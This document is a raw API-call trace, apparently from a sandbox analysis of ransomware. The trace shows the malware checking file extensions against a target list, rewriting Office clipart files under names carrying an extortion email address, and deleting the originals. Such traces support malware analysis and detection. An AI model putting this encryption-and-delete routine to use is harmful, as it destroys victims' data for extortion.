lstrlenW (lpString=".ppt") returned 4 [0269.197] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0269.197] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01139_.WMF") returned 63 [0269.197] lstrlenW (lpString=".zip") returned 4 [0269.197] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0269.197] lstrlenW (lpString=".rar") returned 4 [0269.197] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0269.197] lstrlenW (lpString=".bz2") returned 4 [0269.197] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0269.197] lstrlenW (lpString=".7z") returned 3 [0269.197] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0269.197] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01139_.WMF") returned 63 [0269.197] lstrlenW (lpString=".dbf") returned 4 [0269.197] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0269.197] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01139_.WMF") returned 63 [0269.198] lstrlenW (lpString=".1cd") returned 4 [0269.198] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0269.198] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01139_.WMF") returned 63 [0269.198] lstrlenW (lpString=".jpg") returned 4 [0269.198] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0269.198] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01139_.WMF") returned 63 [0269.198] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01139_.WMF") returned 63 [0269.198] lstrlenW (lpString=".doc") returned 4 [0269.198] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0269.198] lstrlenW (lpString=".docx") returned 5 [0269.198] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0269.198] lstrlenW (lpString=".pdf") returned 4 [0269.198] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0269.198] lstrlenW (lpString=".xls") returned 4 [0269.198] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0269.198] lstrlenW (lpString=".xlsx") returned 5 [0269.198] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0269.198] lstrlenW (lpString=".ppt") returned 4 [0269.198] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0269.198] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01139_.WMF") returned 63 [0269.198] lstrlenW (lpString=".zip") returned 4 [0269.198] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0269.198] lstrlenW (lpString=".rar") returned 4 [0269.198] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0269.198] lstrlenW (lpString=".bz2") returned 4 [0269.198] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0269.198] lstrlenW (lpString=".7z") returned 3 [0269.198] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0269.198] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01139_.WMF") returned 63 [0269.198] lstrlenW (lpString=".dbf") returned 4 [0269.198] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0269.199] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01139_.WMF") returned 63 [0269.199] lstrlenW (lpString=".1cd") returned 4 [0269.199] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0269.199] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01139_.WMF") returned 63 [0269.199] lstrlenW (lpString=".jpg") returned 4 [0269.199] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0269.199] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0269.199] lstrlenW (lpString="DD01145_.WMF") returned 12 [0269.199] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01145_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01145_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b4 [0269.199] GetFileSizeEx (in: hFile=0x2b4, lpFileSize=0x2fbff1c | out: lpFileSize=0x2fbff1c*=2780) returned 1 [0269.199] CloseHandle (hObject=0x2b4) returned 1 [0269.199] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01145_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01145_.wmf")) returned 0x20 [0269.199] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01145_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01145_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0269.199] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01145_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01145_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b4 [0269.200] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fbfec8 | out: lpNewFilePointer=0x0) returned 1 [0269.200] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fbfec8 | out: lpNewFilePointer=0x0) returned 1 [0269.200] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01145_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01145_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0269.202] GetLastError () returned 0x0 [0269.202] ReadFile (in: hFile=0x2b4, lpBuffer=0x3bd0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fbfed4, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesRead=0x2fbfed4*=0xadc, lpOverlapped=0x0) returned 1 [0269.203] WriteFile (in: hFile=0x384, lpBuffer=0x3bd0020*, nNumberOfBytesToWrite=0xae0, lpNumberOfBytesWritten=0x2fbfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesWritten=0x2fbfc9c*=0xae0, lpOverlapped=0x0) returned 1 [0269.204] ReadFile (in: hFile=0x2b4, lpBuffer=0x3bd0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fbfed4, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesRead=0x2fbfed4*=0x0, lpOverlapped=0x0) returned 1 [0269.204] WriteFile (in: hFile=0x384, lpBuffer=0x3bd0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2fbfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesWritten=0x2fbfc9c*=0xec, lpOverlapped=0x0) returned 1 [0269.205] SetEndOfFile (hFile=0x384) returned 1 [0269.205] CloseHandle (hObject=0x384) returned 1 [0269.205] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fbfec8 | out: lpNewFilePointer=0x0) returned 1 [0269.205] SetEndOfFile (hFile=0x2b4) returned 1 [0269.206] CloseHandle (hObject=0x2b4) returned 1 [0269.206] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01145_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0269.207] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01145_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01145_.wmf")) returned 1 [0269.207] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01145_.WMF") returned 63 [0269.207] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01145_.WMF") returned 63 [0269.207] lstrlenW (lpString=".doc") returned 4 [0269.207] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0269.207] lstrlenW (lpString=".docx") returned 5 [0269.207] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0269.207] lstrlenW (lpString=".pdf") returned 4 [0269.207] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0269.207] lstrlenW (lpString=".xls") returned 4 [0269.207] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0269.207] lstrlenW (lpString=".xlsx") returned 5 [0269.207] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0269.207] lstrlenW (lpString=".ppt") returned 4 [0269.207] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0269.207] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01145_.WMF") returned 63 [0269.207] lstrlenW (lpString=".zip") returned 4 [0269.207] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0269.207] lstrlenW (lpString=".rar") returned 4 [0269.207] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0269.207] lstrlenW (lpString=".bz2") returned 4 [0269.207] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0269.207] lstrlenW (lpString=".7z") returned 3 [0269.208] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0269.208] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01145_.WMF") returned 63 [0269.208] lstrlenW (lpString=".dbf") returned 4 [0269.208] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0269.208] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01145_.WMF") returned 63 [0269.208] lstrlenW (lpString=".1cd") returned 4 [0269.208] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0269.208] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01145_.WMF") returned 63 [0269.208] lstrlenW (lpString=".jpg") returned 4 [0269.208] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0269.208] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01145_.WMF") returned 63 [0269.208] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01145_.WMF") returned 63 [0269.208] lstrlenW (lpString=".doc") returned 4 [0269.208] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0269.208] lstrlenW (lpString=".docx") returned 5 [0269.208] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0269.208] lstrlenW (lpString=".pdf") returned 4 [0269.208] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0269.208] lstrlenW (lpString=".xls") returned 4 [0269.208] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0269.208] lstrlenW (lpString=".xlsx") returned 5 [0269.208] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0269.208] lstrlenW (lpString=".ppt") returned 4 [0269.208] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0269.208] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01145_.WMF") returned 63 [0269.208] lstrlenW (lpString=".zip") returned 4 [0269.208] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0269.208] lstrlenW (lpString=".rar") returned 4 [0269.208] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0269.208] lstrlenW (lpString=".bz2") returned 4 [0269.208] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0269.209] lstrlenW (lpString=".7z") returned 3 [0269.209] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0269.209] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01145_.WMF") returned 63 [0269.209] lstrlenW (lpString=".dbf") returned 4 [0269.209] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0269.209] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01145_.WMF") returned 63 [0269.209] lstrlenW (lpString=".1cd") returned 4 [0269.209] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0269.209] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01145_.WMF") returned 63 [0269.209] lstrlenW (lpString=".jpg") returned 4 [0269.209] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0269.209] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0269.209] lstrlenW (lpString="DD01146_.WMF") returned 12 [0269.209] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01146_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01146_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b4 [0269.209] GetFileSizeEx (in: hFile=0x2b4, lpFileSize=0x2fbff1c | out: lpFileSize=0x2fbff1c*=2796) returned 1 [0269.209] CloseHandle (hObject=0x2b4) returned 1 [0269.209] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01146_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01146_.wmf")) returned 0x20 [0269.209] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01146_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01146_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0269.210] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01146_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01146_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b4 [0269.210] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fbfec8 | out: lpNewFilePointer=0x0) returned 1 [0269.210] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fbfec8 | out: lpNewFilePointer=0x0) returned 1 [0269.210] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01146_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01146_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0269.210] GetLastError () returned 0x0 [0269.210] ReadFile (in: hFile=0x2b4, lpBuffer=0x3bd0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fbfed4, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesRead=0x2fbfed4*=0xaec, lpOverlapped=0x0) returned 1 [0269.212] WriteFile (in: hFile=0x384, lpBuffer=0x3bd0020*, nNumberOfBytesToWrite=0xaf0, lpNumberOfBytesWritten=0x2fbfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesWritten=0x2fbfc9c*=0xaf0, lpOverlapped=0x0) returned 1 [0269.212] ReadFile (in: hFile=0x2b4, lpBuffer=0x3bd0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fbfed4, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesRead=0x2fbfed4*=0x0, lpOverlapped=0x0) returned 1 [0269.213] WriteFile (in: hFile=0x384, lpBuffer=0x3bd0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2fbfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesWritten=0x2fbfc9c*=0xec, lpOverlapped=0x0) returned 1 [0269.213] SetEndOfFile (hFile=0x384) returned 1 [0269.213] CloseHandle (hObject=0x384) returned 1 [0269.213] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fbfec8 | out: lpNewFilePointer=0x0) returned 1 [0269.213] SetEndOfFile (hFile=0x2b4) returned 1 [0269.215] CloseHandle (hObject=0x2b4) returned 1 [0269.216] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01146_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0269.216] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01146_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01146_.wmf")) returned 1 [0269.216] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01146_.WMF") returned 63 [0269.216] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01146_.WMF") returned 63 [0269.216] lstrlenW (lpString=".doc") returned 4 [0269.216] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0269.216] lstrlenW (lpString=".docx") returned 5 [0269.216] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0269.216] lstrlenW (lpString=".pdf") returned 4 [0269.216] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0269.216] lstrlenW (lpString=".xls") returned 4 [0269.216] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0269.216] lstrlenW (lpString=".xlsx") returned 5 [0269.216] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0269.216] lstrlenW (lpString=".ppt") returned 4 [0269.216] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0269.216] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01146_.WMF") returned 63 [0269.216] lstrlenW (lpString=".zip") returned 4 [0269.216] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0269.216] lstrlenW (lpString=".rar") returned 4 [0269.216] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0269.217] lstrlenW (lpString=".bz2") returned 4 [0269.217] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0269.217] lstrlenW (lpString=".7z") returned 3 [0269.217] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0269.217] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01146_.WMF") returned 63 [0269.217] lstrlenW (lpString=".dbf") returned 4 [0269.217] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0269.217] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01146_.WMF") returned 63 [0269.217] lstrlenW (lpString=".1cd") returned 4 [0269.217] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0269.217] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01146_.WMF") returned 63 [0269.217] lstrlenW (lpString=".jpg") returned 4 [0269.217] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0269.217] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01146_.WMF") returned 63 [0269.217] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01146_.WMF") returned 63 [0269.217] lstrlenW (lpString=".doc") returned 4 [0269.217] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0269.217] lstrlenW (lpString=".docx") returned 5 [0269.217] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0269.217] lstrlenW (lpString=".pdf") returned 4 [0269.217] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0269.363] lstrlenW (lpString=".xls") returned 4 [0269.363] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0269.363] lstrlenW (lpString=".xlsx") returned 5 [0269.364] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0269.364] lstrlenW (lpString=".ppt") returned 4 [0269.364] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0269.364] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01146_.WMF") returned 63 [0269.364] lstrlenW (lpString=".zip") returned 4 [0269.364] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0269.364] lstrlenW (lpString=".rar") returned 4 [0269.364] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0269.364] lstrlenW (lpString=".bz2") returned 4 [0269.364] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0269.364] lstrlenW (lpString=".7z") returned 3 [0269.364] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0269.364] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01146_.WMF") returned 63 [0269.364] lstrlenW (lpString=".dbf") returned 4 [0269.364] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0269.364] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01146_.WMF") returned 63 [0269.364] lstrlenW (lpString=".1cd") returned 4 [0269.364] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0269.364] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01146_.WMF") returned 63 [0269.364] lstrlenW (lpString=".jpg") returned 4 [0269.364] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0269.364] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0269.364] lstrlenW (lpString="DD01163_.WMF") returned 12 [0269.365] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01163_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01163_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac [0269.371] GetFileSizeEx (in: hFile=0x3ac, lpFileSize=0x2fbff1c | out: lpFileSize=0x2fbff1c*=2300) returned 1 [0269.371] CloseHandle (hObject=0x3ac) returned 1 [0269.371] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01163_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01163_.wmf")) returned 0x20 [0269.371] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01163_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01163_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0269.371] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01163_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01163_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac [0269.371] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fbfec8 | out: lpNewFilePointer=0x0) returned 1 [0269.371] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fbfec8 | out: lpNewFilePointer=0x0) returned 1 [0269.371] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01163_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01163_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0 [0269.372] GetLastError () returned 0x0 [0269.372] ReadFile (in: hFile=0x3ac, lpBuffer=0x3bd0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fbfed4, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesRead=0x2fbfed4*=0x8fc, lpOverlapped=0x0) returned 1 [0269.400] WriteFile (in: hFile=0x3b0, lpBuffer=0x3bd0020*, nNumberOfBytesToWrite=0x900, lpNumberOfBytesWritten=0x2fbfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesWritten=0x2fbfc9c*=0x900, lpOverlapped=0x0) returned 1 [0269.400] ReadFile (in: hFile=0x3ac, lpBuffer=0x3bd0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fbfed4, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesRead=0x2fbfed4*=0x0, lpOverlapped=0x0) returned 1 [0269.400] WriteFile (in: hFile=0x3b0, lpBuffer=0x3bd0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2fbfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesWritten=0x2fbfc9c*=0xec, lpOverlapped=0x0) returned 1 [0269.400] SetEndOfFile (hFile=0x3b0) returned 1 [0269.400] CloseHandle (hObject=0x3b0) returned 1 [0269.400] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fbfec8 | out: lpNewFilePointer=0x0) returned 1 [0269.401] SetEndOfFile (hFile=0x3ac) returned 1 [0269.403] CloseHandle (hObject=0x3ac) returned 1 [0269.403] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01163_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0269.480] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01163_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01163_.wmf")) returned 1 [0269.481] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01163_.WMF") returned 63 [0269.481] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01163_.WMF") returned 63 [0269.481] lstrlenW (lpString=".doc") returned 4 [0269.481] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0269.481] lstrlenW (lpString=".docx") returned 5 [0269.481] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0269.481] lstrlenW (lpString=".pdf") returned 4 [0269.481] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0269.481] lstrlenW (lpString=".xls") returned 4 [0269.481] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0269.481] lstrlenW (lpString=".xlsx") returned 5 [0269.481] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0269.481] lstrlenW (lpString=".ppt") returned 4 [0269.481] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0269.481] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01163_.WMF") returned 63 [0269.481] lstrlenW (lpString=".zip") returned 4 [0269.481] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0269.481] lstrlenW (lpString=".rar") returned 4 [0269.481] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0269.482] lstrlenW (lpString=".bz2") returned 4 [0269.482] lstrcmpiW 